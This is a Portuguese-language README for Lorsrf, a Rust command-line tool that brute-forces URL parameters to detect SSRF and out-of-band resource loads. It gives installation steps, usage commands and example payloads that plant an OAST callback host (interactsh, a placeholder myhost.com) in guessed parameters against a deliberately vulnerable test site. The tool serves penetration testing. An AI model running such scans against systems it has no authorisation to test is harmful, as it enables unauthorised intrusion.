
Ferramenta CLI rápida para encontrar os parâmetros que podem ser usados para encontrar SSRF ou Out-of-band resource load 🛰️ 🦀

O Lorsrf é uma poderosa ferramenta de teste de penetração web projetada para identificar parâmetros que podem ser explorados para ataques SSRF ou de carga de recursos fora de banda. Ao adicionar um host OAST como Burp Collaborator ao valor do parâmetro, o Lorsrf pode gerar uma requisição HTTP que é recebida no Burp Collaborator, sem nenhuma informação real sobre o alvo.
Para resolver esse problema, o Lorsrf inclui um recurso que permite adicionar peças específicas de informações do alvo como variáveis no seu host OAST. Isso permite identificar mais facilmente parâmetros e endpoints vulneráveis, facilitando a segurança de suas aplicações web.
Além disso, o Lorsrf também permite incluir informações adicionais no seu host OAST usando variáveis especiais. Por exemplo, você pode incluir o endpoint do seu domínio alvo, a consulta da URL, o método de requisição atual, e mais.
No geral, o Lorsrf é uma ferramenta poderosa que pode ser personalizada para atender às suas necessidades específicas de teste de penetração web. Se você está procurando identificar e corrigir vulnerabilidades em suas próprias aplicações web ou avaliar a segurança de aplicações web de terceiros, o Lorsrf é uma adição valiosa a qualquer kit de ferramentas de pentest.
| Variável | Descrição |
|---|---|
| %PARAM% | o parâmetro adivinhado |
| %PATH% | o endpoint do seu domínio alvo |
| %HOST% | o host de varredura |
| %QUERY% | a consulta da URL |
| %METHOD% | MÉTODO atual |
você pode usar estas para incluir mais informações no seu host OAST
target: http://testphp.vulnweb.com/showimage.php
payload: http://%HOST%.%PARAM%.testing.interactsh.com%PATH%
output: http://testphp.vulnweb.com.file.testing.interactsh.com/showimage.php
por padrão o lorsrf usa o método GET; se você quiser o método POST com corpo de formulário ou JSON, pode adicionar essas flags
$ lorsrf --json --form
se você quiser apenas POST, adicione a flag --post-only
>>> apt install gcc pkg-config libssl-dev
>>> cargo install --git https://github.com/knassar702/lorsrf
ou baixe da página de releases
$ lorsrf --urls targets.txt -c "http://myhost.com" --wordlist params.txt
$ lorsrf --urls targets.txt -c "http://myhost.com" --wordlist params.txt --json
$ lorsrf --urls targets.txt -c "http://myhost.com" --wordlist params.txt --form
varredura de parâmetros sem adivinhação
$ waybackurls http://testphp.vulnweb.com > urls.txt
$ lorsrf --urls urls.txt -c "http://myhost.com" --wordlist params.txt
mais opções
Lorsrf 2.0
Khaled Nassar <[email protected]>
SSRF Parameter BruteForce Tool
USAGE:
lorsrf [FLAGS] [OPTIONS] --call <host> --urls <targets>
FLAGS:
-f, --form Use x-www-form-urlencoded requests via POST method
-h, --help Prints help information
-j, --json Use JSON requests via POST method
--post-only POST method only
-V, --version Prints version information
OPTIONS:
-H, --headers <headers> Your Headers [default: ]
-c, --call <host> Your The OAST Host (burpsuite collaborator or interactsh.com)
-p, --proxy <proxy> SendProxy [default: ]
-u, --urls <targets> Your Targets list
--threads <threads> Your Threads [default: 10]
-t, --timeout <timeout> Set the Timeout of the requests [default: 10]
-w, --wordlist <wordlist> Your Parameters Wordlist